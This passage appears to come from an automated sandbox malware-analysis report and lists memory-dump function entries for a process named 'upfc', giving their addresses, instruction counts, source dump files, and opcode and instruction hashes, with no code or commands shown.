                                                      • Snapshot File: hcaresult_17_2_7ff7c1b80000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5908bae4de32c18e5f17626e979aab55aaa420f94a98fda719df2e15f86b8089
                                                      • Instruction ID: b2666e0be10d3d07c31afbda1cde614cd06a9014e26db6e90598fc7c88bd0591
                                                      • Opcode Fuzzy Hash: 5908bae4de32c18e5f17626e979aab55aaa420f94a98fda719df2e15f86b8089
                                                      • Instruction Fuzzy Hash: EC112B10D6E4668EF7289E0890605F4F351FF91311B68467ED04F878CAC868F8818FB0
                                                      Function 00007FF7C1B86500 Relevance: .1, Instructions: 67COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2544752682.00007FF7C1B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1B80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c1b80000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6b8db932242354fba2f9b9316fc71f8716be20cad062504c56d10ff3fc4fe8ef
                                                      • Instruction ID: 042dee32fa9e241abe99a8c90b8b442f5172169e844e61fc9c9ab2d09cc65366
                                                      • Opcode Fuzzy Hash: 6b8db932242354fba2f9b9316fc71f8716be20cad062504c56d10ff3fc4fe8ef
                                                      • Instruction Fuzzy Hash: 2B11BB2091C46F46F7289E1884745F4F392FF50721B645A7DC05F8B99ECA68F9829FB0
                                                      Function 00007FF7C1791F88 Relevance: .1, Instructions: 66COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2538433781.00007FF7C1790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c1790000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2c0fc13137a429378921833c633d8d34b5ff304a2c44a08189902e38b89b2002
                                                      • Instruction ID: 8f9787e674a5b66ad752c3a9fa6710f1e2562d19ea4d8e641ed7c75f36bc93d6
                                                      • Opcode Fuzzy Hash: 2c0fc13137a429378921833c633d8d34b5ff304a2c44a08189902e38b89b2002
                                                      • Instruction Fuzzy Hash: 5B118632E1C9198EEB64FE3D94496F8A392EF4C331FD401B6D40DD3193DEA968594650
                                                      Function 00007FF7C17B2649 Relevance: .1, Instructions: 64COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2538433781.00007FF7C17B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C17B1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c17b1000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ffb12065cee6945d38573dcb56b9b55ef0718f606521a8069b38d8ca2530a7b4
                                                      • Instruction ID: bee7a752c38ffe569d23f59bc369a065951e90ce2badd3e1ad3725e119a252c3
                                                      • Opcode Fuzzy Hash: ffb12065cee6945d38573dcb56b9b55ef0718f606521a8069b38d8ca2530a7b4
                                                      • Instruction Fuzzy Hash: E111F36040F7C15FC703973A4C69594BFB0AF2711078E86EBC489CB5E3D65D684A8762
                                                      Function 00007FF7C1CA226C Relevance: .1, Instructions: 64COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2547403812.00007FF7C1CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1CA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c1ca0000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f168ef15b986edbbd855ce80509f26b61c7274c5622ff81f2d190fadf7d81623
                                                      • Instruction ID: d6a23b1ff7dc564a03bfed97cfaffa2a51f1980cd0c7af958302901ca5eb0b35
                                                      • Opcode Fuzzy Hash: f168ef15b986edbbd855ce80509f26b61c7274c5622ff81f2d190fadf7d81623
                                                      • Instruction Fuzzy Hash: E611C47044F3C25FD3635B3458240A0BFF0AF1323171A46FBD088CE4A3D6985889C7A2
                                                      Function 00007FF7C1791FC9 Relevance: .1, Instructions: 57COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2538433781.00007FF7C1790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c1790000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8eb7b3f777e70a63fde5cc853af094d1f574193fa831fbabfc2f13f5286eefe3
                                                      • Instruction ID: f9632783ead7badec000c7c79e63bd17a4fcad6254de62bfa84cc3912c54dac0
                                                      • Opcode Fuzzy Hash: 8eb7b3f777e70a63fde5cc853af094d1f574193fa831fbabfc2f13f5286eefe3
                                                      • Instruction Fuzzy Hash: CE11FE31A1840A8FEB54FF29C449BB8A3A2AF59321F9541B5D00DC7293DEA9A8558B50
                                                      Function 00007FF7C1790C38 Relevance: .1, Instructions: 52COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2538433781.00007FF7C1790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c1790000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c2a5cff076a7ac70391d34743302604dbd6dad1b03affb162b7b9f8ab12b6d65
                                                      • Instruction ID: a15e846fa1af57cae6c90f3538bc93ec922523e15d72208cd0461064216900c4
                                                      • Opcode Fuzzy Hash: c2a5cff076a7ac70391d34743302604dbd6dad1b03affb162b7b9f8ab12b6d65
                                                      • Instruction Fuzzy Hash: 4E11AC36A1C7898FE702EB7888492DDBFB0EF46220F5545B6C084DB293E678564987A0
                                                      Function 00007FF7C1CA5783 Relevance: .0, Instructions: 50COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2547403812.00007FF7C1CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1CA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c1ca0000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ff8d9904342faa8a9adb60e0e7e2042fd4e4206cd7fefa13a5fbdb0a51f7f279
                                                      • Instruction ID: 036db111881224c198694ab623953b2ea22622abb800c1675b1c0d80d5507233
                                                      • Opcode Fuzzy Hash: ff8d9904342faa8a9adb60e0e7e2042fd4e4206cd7fefa13a5fbdb0a51f7f279
                                                      • Instruction Fuzzy Hash: 2B01F720E0C809CAFED6BE2894445B9A392EFA8370FA44574E10EC32C3DD59E8424720
                                                      Function 00007FF7C1796D78 Relevance: .0, Instructions: 48COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2538433781.00007FF7C1790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c1790000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2aaf8b78d00af7be8b7960a488533d84bb4fd76ef76e610e94264f05941a9204
                                                      • Instruction ID: 489682d4055c6915d281287a2b9a414e65a3b3f85941c68b4e9887a72dce7d65
                                                      • Opcode Fuzzy Hash: 2aaf8b78d00af7be8b7960a488533d84bb4fd76ef76e610e94264f05941a9204
                                                      • Instruction Fuzzy Hash: 86110930908A188FDB59EF18C890BA8B3A1FB68310F5042B9D04ED3295CB74ADC5CB81
                                                      Function 00007FF7C17A4591 Relevance: .0, Instructions: 46COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2538433781.00007FF7C17A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C17A0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c17a0000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 46fc22273bf8b744c011f5a3733779683c671415e2c547a9ae21c7bb8fa04d19
                                                      • Instruction ID: ce75ceb6a4f3b947c598ece52a0d40710861a4755958162c11217b1aa8f08648
                                                      • Opcode Fuzzy Hash: 46fc22273bf8b744c011f5a3733779683c671415e2c547a9ae21c7bb8fa04d19
                                                      • Instruction Fuzzy Hash: C9F02831A0C9864FE322A73584102B97B91FF99320F5803BBC08EC74D3DDACE5158365
                                                      Function 00007FF7C1790C40 Relevance: .0, Instructions: 46COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2538433781.00007FF7C1790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c1790000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 31f4267a275c1b64dfdbc4c3b2447f2ca25d956ffc738a40ed06dc14f76163fd
                                                      • Instruction ID: 6827df8f9422277e6bc8451e7924de6265b56786b7509167b92538d995a36ad7
                                                      • Opcode Fuzzy Hash: 31f4267a275c1b64dfdbc4c3b2447f2ca25d956ffc738a40ed06dc14f76163fd
                                                      • Instruction Fuzzy Hash: 38018B3690C7898FE702EB7888582D9BFB0EF46220F1545B6C481DB293D6785648CB90
                                                      Function 00007FF7C17A40E8 Relevance: .0, Instructions: 40COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2538433781.00007FF7C17A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C17A0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c17a0000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 165b42027a7c10a07b0f702fdaafe1f86fa5d90c5f8d6ab8b59dd178d01cf5e3
                                                      • Instruction ID: 35e76be9b3e55fa5fdc18e40043ca113aa22385cbdd4aad091de7e83a2edca1e
                                                      • Opcode Fuzzy Hash: 165b42027a7c10a07b0f702fdaafe1f86fa5d90c5f8d6ab8b59dd178d01cf5e3
                                                      • Instruction Fuzzy Hash: 33018F71E1841A8BEB14AF44C8556BEB3A1FB58321F40423AC016926D1DFB869018791
                                                      Function 00007FF7C1790C48 Relevance: .0, Instructions: 40COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2538433781.00007FF7C1790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c1790000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: bf57509f4113e99e49401869ced851d1f2047bbd9ca5f50acc20cd9b543e08d9
                                                      • Instruction ID: 1b9469c187a5810d9fd7dfdbcda51948a9fadd6553f7a2ac1a901be382a98857
                                                      • Opcode Fuzzy Hash: bf57509f4113e99e49401869ced851d1f2047bbd9ca5f50acc20cd9b543e08d9
                                                      • Instruction Fuzzy Hash: F0018C3690C7898FE702EB78C848299BFB0AF06320F1542EAD051DB293E6785A48C790
                                                      Function 00007FF7C1B83BE2 Relevance: .0, Instructions: 36COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2544752682.00007FF7C1B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1B80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c1b80000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e605b7b9b916609af93fa4cdb3408c9764ef202dd7424493d8b1d094b8574baf
                                                      • Instruction ID: 9fd981128cbcc860b6d57d8f72e0444c6cbe571126205b1b4c571456c21c8abe
                                                      • Opcode Fuzzy Hash: e605b7b9b916609af93fa4cdb3408c9764ef202dd7424493d8b1d094b8574baf
                                                      • Instruction Fuzzy Hash: 84F0F63144D3C6AFD702EF7088514E9BFB4EF03210B1540FAD455C70A2C66D6616CB71
                                                      Function 00007FF7C1790C50 Relevance: .0, Instructions: 35COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2538433781.00007FF7C1790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c1790000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: dd8f8ed9c71b062d504d2108c6d339c8ce78021479893f8b9369441ecfd12ce7
                                                      • Instruction ID: 75007f29b25650f75f5d89928687d307915ed90dfd9b5623c51c7618dcdfe358
                                                      • Opcode Fuzzy Hash: dd8f8ed9c71b062d504d2108c6d339c8ce78021479893f8b9369441ecfd12ce7
                                                      • Instruction Fuzzy Hash: B1017C3580C7C98FE702EB78884829DBFB0AF06324F1442E6D451DB293EA785A48C751
                                                      Function 00007FF7C1792096 Relevance: .0, Instructions: 35COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2538433781.00007FF7C1790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c1790000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c0b67d8018478311337d0be313e8e759ba3daf077f094f559c4b14e2bffb0724
                                                      • Instruction ID: ff3f6a01ba89ec7791faf59098130f0f955a6273bef64bef5e651cafb25ca273
                                                      • Opcode Fuzzy Hash: c0b67d8018478311337d0be313e8e759ba3daf077f094f559c4b14e2bffb0724
                                                      • Instruction Fuzzy Hash: D2F0E131D5840E8BEB64FE29C855BF8B366EB58331F9401BAC40DD3193DEBDA9858B50
                                                      Function 00007FF7C1CA7A49 Relevance: .0, Instructions: 33COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2547403812.00007FF7C1CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1CA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c1ca0000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 79ce6fed1f83d1623b8c91f40154a3665a52a3ec23d6cec261048a35320a7f8a
                                                      • Instruction ID: 861c2cad62a9884c412ff7e20134c92a385eb655ca02fc90d99b7fd486f14f35
                                                      • Opcode Fuzzy Hash: 79ce6fed1f83d1623b8c91f40154a3665a52a3ec23d6cec261048a35320a7f8a
                                                      • Instruction Fuzzy Hash: 4BF0E531B0DF880FD76A962D586D061BFE1DBAA12134A03EFD045C76F3ED99AC888341
                                                      Function 00007FF7C17AB852 Relevance: .0, Instructions: 32COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2538433781.00007FF7C17A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C17A0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c17a0000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c4df96102b8c236b4f6ad198156bd36a8b7effc69c40f48d9ef41c4c5d2c73a1
                                                      • Instruction ID: 46544b01ff8ff3197fa3bbd67765f75f0b1eb87919a4c7adbb69935f61eaff74
                                                      • Opcode Fuzzy Hash: c4df96102b8c236b4f6ad198156bd36a8b7effc69c40f48d9ef41c4c5d2c73a1
                                                      • Instruction Fuzzy Hash: 98F0C4709089199FEBD4FF288855BA9B2E1FF98310F5082B5D00DD3292CE3469858B90
                                                      Function 00007FF7C17AA7AB Relevance: .0, Instructions: 32COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2538433781.00007FF7C17A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C17A0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c17a0000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: badb7e0ddeb5ac7d5f3c1ca34f28f8679b9070207b9afdcbe8175b4a132eaba8
                                                      • Instruction ID: 4fe394a1745a97e567b0cb37ae6206240f4a165bf800db378d64f6fd71194c32
                                                      • Opcode Fuzzy Hash: badb7e0ddeb5ac7d5f3c1ca34f28f8679b9070207b9afdcbe8175b4a132eaba8
                                                      • Instruction Fuzzy Hash: 70F05E21E0C90B5BE750BB2984906A9A251AB59320F948675D40DDB2C7DEACEC0843A0
                                                      Function 00007FF7C1CA91A9 Relevance: .0, Instructions: 31COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2547403812.00007FF7C1CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1CA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c1ca0000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 180a2e1a3447f718f478372773600a944a771f5a576dc1a611eb18f7cf78bb52
                                                      • Instruction ID: d64fdd0b19cd7f30ff1a8db6be3b7191e04b64d52e2aac1fd23e23670e7a16d6
                                                      • Opcode Fuzzy Hash: 180a2e1a3447f718f478372773600a944a771f5a576dc1a611eb18f7cf78bb52
                                                      • Instruction Fuzzy Hash: B6E09221B09B884FC70E5A388C694507FA2EFAB10238A43DBC445CF1E3ED29DC88C751
                                                      Function 00007FF7C17BC7A9 Relevance: .0, Instructions: 30COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2538433781.00007FF7C17B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C17B1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c17b1000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 66b32461f60cabb6a3b24d0609fd25a89bc631ab30e6334e05a658b1f2fd7e45
                                                      • Instruction ID: e96960893c51c8c45bffad3232de0eee44c321af8f789e3d94656d8f5f8f7dd0
                                                      • Opcode Fuzzy Hash: 66b32461f60cabb6a3b24d0609fd25a89bc631ab30e6334e05a658b1f2fd7e45
                                                      • Instruction Fuzzy Hash: 7CF0656551E7C40FD312AB388D654147FF0EF2B10535A45FBC4C9CB5B3D65A484AC312
                                                      Function 00007FF7C17920CF Relevance: .0, Instructions: 30COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2538433781.00007FF7C1790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c1790000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f1d35f1724f1adc6db49046a45d6106ecbbea99bb5a5f4fe40b332a5eb99e0b2
                                                      • Instruction ID: bc585f53cb95a19b4205754609885cded2c5bd28568238c9dcb5f1eb39e2eeb7
                                                      • Opcode Fuzzy Hash: f1d35f1724f1adc6db49046a45d6106ecbbea99bb5a5f4fe40b332a5eb99e0b2
                                                      • Instruction Fuzzy Hash: 36F03031E184098BEB10FE29C849AB8A357AF59370F9041B5C40DD32D7EDADA9498660
                                                      Function 00007FF7C1CA7629 Relevance: .0, Instructions: 30COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2547403812.00007FF7C1CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1CA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c1ca0000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e5812d431047b7662c6e0e284ca9c591ce6ca7c37ea19df963ae1edc5f20a50e
                                                      • Instruction ID: 19f2a722156356ab687a50eb531a2058a74835c557757229bbb1cc0d15e826cf
                                                      • Opcode Fuzzy Hash: e5812d431047b7662c6e0e284ca9c591ce6ca7c37ea19df963ae1edc5f20a50e
                                                      • Instruction Fuzzy Hash: C7E0D830B09B884FC70E56384C684507BB1EB7711138902EBC405CB2A3ED1DDCC9C751
                                                      Function 00007FF7C1CA7B69 Relevance: .0, Instructions: 27COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2547403812.00007FF7C1CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1CA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c1ca0000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3f1ce4db7e4fcdebc8145ea55d4b46d59e30c18df846536b944ba3b9c699db6c
                                                      • Instruction ID: fa9ba3237081e396e09ba6a660b706912e494601f10146347000c6d83cf2cf21
                                                      • Opcode Fuzzy Hash: 3f1ce4db7e4fcdebc8145ea55d4b46d59e30c18df846536b944ba3b9c699db6c
                                                      • Instruction Fuzzy Hash: 3BE01A21A4A7884FC74E9A388C659503FA1DAAB25174A41DBD485CF1F3E529C98CC722
                                                      Function 00007FF7C1792B40 Relevance: .0, Instructions: 25COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2538433781.00007FF7C1790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c1790000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8f7ab15e07f9f44bd1b39b12e138568b7c5039ab6e02509fa8ce3889be5409fc
                                                      • Instruction ID: 278edd2aa508107ed6df67ac48e2af0dcdde818e0e4f5d921451e21bda3221cd
                                                      • Opcode Fuzzy Hash: 8f7ab15e07f9f44bd1b39b12e138568b7c5039ab6e02509fa8ce3889be5409fc
                                                      • Instruction Fuzzy Hash: 20F0A030E0910A4FF744BA35C4143BAA3A09F89330F9400B4C90DD32D3DE28AD458750
                                                      Function 00007FF7C17A3AD0 Relevance: .0, Instructions: 22COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2538433781.00007FF7C17A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C17A0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c17a0000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b7b5e071f3789eae717b10c0ffdfc75cd0be3c54ec7eb2e14fd012d674173004
                                                      • Instruction ID: 624740e71dae718bcd56c73aa6ef227b29225f906b2275ca74e504422623924a
                                                      • Opcode Fuzzy Hash: b7b5e071f3789eae717b10c0ffdfc75cd0be3c54ec7eb2e14fd012d674173004
                                                      • Instruction Fuzzy Hash: E0D0A930B60A0C4B8B0CB63D8858430B3D2E7AA20A384627C940BC3281ED25ECCACB80
                                                      Function 00007FF7C1CA26C9 Relevance: .0, Instructions: 22COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2547403812.00007FF7C1CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1CA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c1ca0000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b17beea925ed294639c5e8fb2a837a031bfe6248618653d695f78cb1f5f626f9
                                                      • Instruction ID: 5342d4362a91c4713af0eee09955fba304882f562ad1d9e4f5640806aa0eaf6c
                                                      • Opcode Fuzzy Hash: b17beea925ed294639c5e8fb2a837a031bfe6248618653d695f78cb1f5f626f9
                                                      • Instruction Fuzzy Hash: FAE0B66290E7884FC70B9B2488659803FB0AE6B25179B11C7C445CF5B3E6598D88CB92
                                                      Function 00007FF7C1B9701E Relevance: .0, Instructions: 20COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2544752682.00007FF7C1B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1B80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c1b80000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 03136506aa8f836af0b5b8846d48790b8aaada9053d672443e523594ead42038
                                                      • Instruction ID: 630f3b626e644208e55a311b16b9652538317330ba6f97229f3cb35b17fc241e
                                                      • Opcode Fuzzy Hash: 03136506aa8f836af0b5b8846d48790b8aaada9053d672443e523594ead42038
                                                      • Instruction Fuzzy Hash: BBD0A7306159044F8B1CBB3C886993077E0EB6A21178400A9D00AC71A2E95AD849CB41
                                                      Function 00007FF7C1790B95 Relevance: .0, Instructions: 19COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2538433781.00007FF7C1790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c1790000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 803acc49ec18d0d45acb6fb8da7e053dd471638d528cdc735f0ecc15faf31192
                                                      • Instruction ID: b37e2e44050ad3ba8960450219b852bdc4dec10a2534946db370d0d3e8fa6bfd
                                                      • Opcode Fuzzy Hash: 803acc49ec18d0d45acb6fb8da7e053dd471638d528cdc735f0ecc15faf31192
                                                      • Instruction Fuzzy Hash: 78D0A73012954E8FDA00B73CC8498587BA0EB0F224FE510F1D009C7962C50948658700
                                                      Function 00007FF7C1CA6B70 Relevance: .0, Instructions: 18COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2547403812.00007FF7C1CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1CA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c1ca0000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                      • Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
                                                      • Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                      • Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741
                                                      Function 00007FF7C1CA5DDF Relevance: .0, Instructions: 17COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2547403812.00007FF7C1CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1CA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c1ca0000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0cfa4d818c6c6f4760c9965c70a9dbe56d2234320516f2974426d8b61e6eb1c0
                                                      • Instruction ID: 1a0df5b259da171c1bfcb12b1a03e05fad0876337e82405051dea72ad8e35382
                                                      • Opcode Fuzzy Hash: 0cfa4d818c6c6f4760c9965c70a9dbe56d2234320516f2974426d8b61e6eb1c0
                                                      • Instruction Fuzzy Hash: 9DD09E31A08D0D9FDF95EA188408964B3E2FBA83507754535900ED3640DEB4F8529790
                                                      Function 00007FF7C17A48B6 Relevance: .0, Instructions: 15COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2538433781.00007FF7C17A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C17A0000, based on PE: false
